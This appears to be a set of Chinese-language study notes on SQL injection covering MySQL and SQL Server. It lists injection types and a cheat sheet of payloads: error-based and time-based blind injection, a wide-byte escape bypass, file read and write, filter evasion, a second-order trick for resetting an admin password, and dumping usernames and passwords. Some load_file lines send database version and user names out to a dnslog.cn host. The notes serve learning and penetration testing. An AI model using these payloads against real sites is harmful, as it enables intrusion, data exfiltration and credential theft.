产生原因:前台与后台进行交互的时候,输入的内容没有经过严格的过滤,造成攻击者可以构造特殊的SQL语句,造成SQL注入攻击
1、用户能控制输入的内容 2、web应用能把用户输入的内容带到数据库中执行
1、GET注入 2、POST注入
1、数值型 2、字符型 3、搜索行
1、联合注入 2、报错注入 3、盲注 4、堆叠注入
1、MySQL注入 2、SQL server注入 3、Oracle注入 4、Access注入
user()/system_user()/current_user()/session_user()
version()/@@version
database()
@@datadir
@@version_compile_os
concat()/concat_ws()/group_concat() substr()/substring()/mid()/left()/right() length()
if(arg1,arg2,arg3)
ascii()/ord() 返回ASCII码 char() 返回ASCII对应的字符 hex() 编码为16进制 unhex() 解码16进制
select * from users where id=1 select * from users where username=‘admin’ select * from users where username like ‘%root%’ insert into table_name(t1,t2,t3) values(v1,v2,v3) update table_name set 字段名=新值 where 字段名=值 delete from table_name where 字段名=值
updatexml(1,concat(0x7e,database(),0x7e),1) extractvalue(1,concat(0x7e,database(),0x7e)) floor() exp() linestring() multipoint()
因为updatexml()和extractvalue()有长度限制,所以爆数据的时候,可以结合limit 0,1,再结合bp爆破使用
if(1=1, sleep(5), 1) benchmark(arg1, arg2) arg1,执行的次数 arg2,表达式 if(1=1, benchmark(1000000, md5(‘abc’)), 1) 执行md5加密’abc’100万次,这样也会使页面延时显示
盲注的话,需要结合length(database())函数,先得到长度,再一个字符一个字符去猜 再结合count(*)函数,猜有几列 然后这里也可以结合ascii(substr(database(),1,1)),把单个字符转换为ascii码,再去结合bp爆破,就比硬猜要好一点
PHP有特殊字符转义函数:addslashes()、mysql_real_escape_string()、mysql_escape_string()、magic_quotes_gpc 数据库采用的编码格式为GBK 转义时,用%df与\结合起来组成一个宽字符,这样就达不到转义的效果
避免宽字节注入,就不应该使用GBK编码,并且使用字符串转义函数
my.ini中,secure_file_priv=
load_file(“文件路径”),只能用来读文件,不能读目录 @@basedir MySql安装路径 @@datadir MySql数据库文件的读取路径
load_file()函数不仅可以读取本地文件,并且还可以读取网络上的文件 于是就可以结合dnslog.cn来实现带外攻击 and select load_file(concat(“\\”,version(), “. 8bzoqi.dnslog.cn\a.txt”)) – - 当回显结果夹杂特殊符号时,可以用十六进制编码绕过 and select load_file(concat(“\\”,hex(user()), “. 8bzoqi.dnslog.cn\a.txt”)) – -
into outfile() into dumpfile() select “文件内容” into outfile/dumpfile “路径+文件名”
登录功能,不能注入 注册功能,不能覆盖已有用户 但是能用来判断已经注册过的用户 不能insert注入 但是注册的新用户的用户名里面能写到特殊字符
这个时候,注册用户admin’ – -,使用该用户登录并且重置该用户密码
源代码中使用的执行SQL语句的函数不同 mysqli_multi_query() :该函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。但是只存储第一个查询语句返回的结果集。 mysql_query() :该函数执行一条 MySQL 查询。
堆叠注入就是因为后台源代码使用了mysqli_multi_query()函数,虽然该函数只存储第一个查询语句返回的结果集,但是后面用分号隔开的语句可以不查询,而是写入文件、插入用户、修改密码、删除数据等操作
1、大小写 2、双写 3、编码 4、使用注释 union/**/select 1,2,3,4 5、等价函数与命令 6、特殊符号 select+id+from users;
单行注释 – - 多行注释 /* */
@@version 数据库版本 db_name() 当前数据库名 user 当前数据库所有者,dbo是每个数据库的默认用户 suser_name() 当前登录数据库的真实用户 substr() 字符串截取 ascii() len() count()
select count(*) from sys.sysdatabases; select top 1 name from sys.sysdatabases; select top 1 name from sys.sysdatabases where name != ‘master’;
sysobjects中存储了该数据库中创建的所有对象,其中包含数据表,xtype就是该对象的类型,u即代表由用户创建的数据表
select count(name) from sysobjects where xtype=‘u’; select count(name) from test.sys.sysobjects where xtype=‘u’; // 对其他数据库下用户创建的表查询 select name from sysobjects where xtype=‘u’; select top 1 name from test.sys.sysobjects where xtype=‘u’; select top 1 name from test.sys.sysobjects where xtype=‘u’ and name !=‘users’;
同一张表中所有字段所对应的ID是一样的
select top 1 name from sys.syscolumns where id=object_id(‘users’); select top 1 name from sys.syscolumns where id=object_id(‘users’) and name != ‘id’;
?id=-1 union select null,username,password from users where id=1 select top 1 username from users where id=1
报错函数:convert(a, b) – 类型转换函数,第一个参数是要转换成的类型,第二个参数是要转换的数据
convert(int, db_name()) ?id=1 and 1=convert(int,(db_name())) ?id=1 and 1=convert(int,(select top 1 username+’~’+password from users where username != ‘zhangsan’))
